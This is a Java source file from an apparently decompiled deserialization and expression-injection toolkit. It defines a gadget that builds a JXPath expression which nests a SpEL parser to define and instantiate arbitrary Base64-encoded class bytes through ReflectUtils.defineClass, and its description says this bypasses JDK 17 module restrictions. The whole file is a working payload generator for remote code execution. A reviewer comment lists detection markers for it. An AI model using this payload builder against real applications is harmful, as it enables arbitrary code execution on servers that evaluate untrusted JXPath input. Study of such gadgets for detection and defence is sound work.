package com.ar3h.chains.gadget.impl.common.expression;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import org.apache.commons.codec.binary.Base64;
import org.apache.commons.lang.RandomStringUtils;

/**
 * Gadget that wraps a byte array from the next chain element in a JXPath expression string.
 *
 * <p>The expression, as written in {@link #jxpathTemplate2}, constructs a
 * {@code SpelExpressionParser} and has it parse a nested SpEL expression. That expression calls
 * {@code org.springframework.cglib.core.ReflectUtils.defineClass} with a class name, a
 * Base64-decoded byte array, the current thread's context class loader, {@code null}, and the
 * {@code org.springframework.expression.ExpressionParser} class. It then calls
 * {@code newInstance()} on the result. The annotation description states that the chain is usable
 * on JDK 17 because it relies on classes in the {@code org.springframework.expression.spel}
 * package to get around module restrictions.
 *
 * <p>NOTE(review), defensive reading: the output is only dangerous when an application evaluates
 * it as a JXPath expression, so the control that matters is keeping untrusted strings out of
 * JXPath evaluation. Markers visible in this file that a reviewer or detection rule can key on are
 * the literal fragments {@code SpelExpressionParser.new()}, {@code ReflectUtils).defineClass} and
 * {@code T(java.util.Base64).getDecoder().decode(} inside an expression, and a defined class named
 * {@code org.springframework.expression.a} followed by 16 alphanumeric characters.
 */
@GadgetAnnotation(
        name = "jxpath表达式嵌套spel加载字节码",
        description = "内部嵌套spel引擎实现加载任意字节码,(jdk17可用,利用org.springframework.expression.spel包下的类去绕过moudule)",
        dependencies = {"jxpath_Expr"},
        authors = {Authors.Unam4})
@GadgetTags(
        tags = {Tag.JXPath_Expr, Tag.Expression},
        nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/expression/JxpathConvert2.class */
public class JxpathConvert2 implements Gadget {
    // Format string with two %s slots, filled in this order: the class name, then the
    // Base64 text of the class bytes. Both are inserted inside single-quoted SpEL literals
    // with no escaping, so the values must not contain a single quote.
    private static String jxpathTemplate2 = "getValue(parseExpression(org.springframework.expression.spel.standard.SpelExpressionParser.new(),\"T(org.springframework.cglib.core.ReflectUtils).defineClass('%s',T(java.util.Base64).getDecoder().decode('%s'),T(java.lang.Thread).currentThread().getContextClassLoader(), null, T(java.lang.Class).forName('org.springframework.expression.ExpressionParser')).newInstance()\"))";

    /**
     * Fills the template with a class name and the Base64 form of the supplied bytes.
     *
     * @param classBytes bytes to embed; encoded with commons-codec {@code Base64}
     * @param className name placed in the first template slot
     * @return the formatted JXPath expression text
     */
    private String getObject(byte[] classBytes, String className) {
        final String encodedClassBytes = Base64.encodeBase64String(classBytes);
        return String.format(jxpathTemplate2, className, encodedClassBytes);
    }

    /**
     * Produces the expression string for this chain step (implements {@code Gadget.invoke}).
     *
     * <p>A class name of the form {@code org.springframework.expression.a} plus 16 random
     * alphanumeric characters is generated and published to the engine as the
     * {@code "className"} gadget parameter before the rest of the chain is asked for its output.
     * Presumably the downstream gadget reads that parameter to name the class it emits; confirm
     * against the engine.
     *
     * @param gadgetContext context whose engine receives the {@code className} parameter
     * @param gadgetChain remaining chain; its {@code doCreate} result is cast to {@code byte[]}
     * @return the JXPath expression as a {@code String}
     * @throws Exception whatever the downstream chain throws; a non-{@code byte[]} result causes a
     *     {@code ClassCastException}
     */
    @Override
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        final String randomSuffix = RandomStringUtils.randomAlphanumeric(16);
        final String generatedClassName = "org.springframework.expression.a" + randomSuffix;

        // Must happen before doCreate so the parameter is set when the next gadget runs.
        gadgetContext.getEngine().setGadgetParam("className", generatedClassName);

        final byte[] classBytes = (byte[]) gadgetChain.doCreate(gadgetContext);
        return getObject(classBytes, generatedClassName);
    }
}
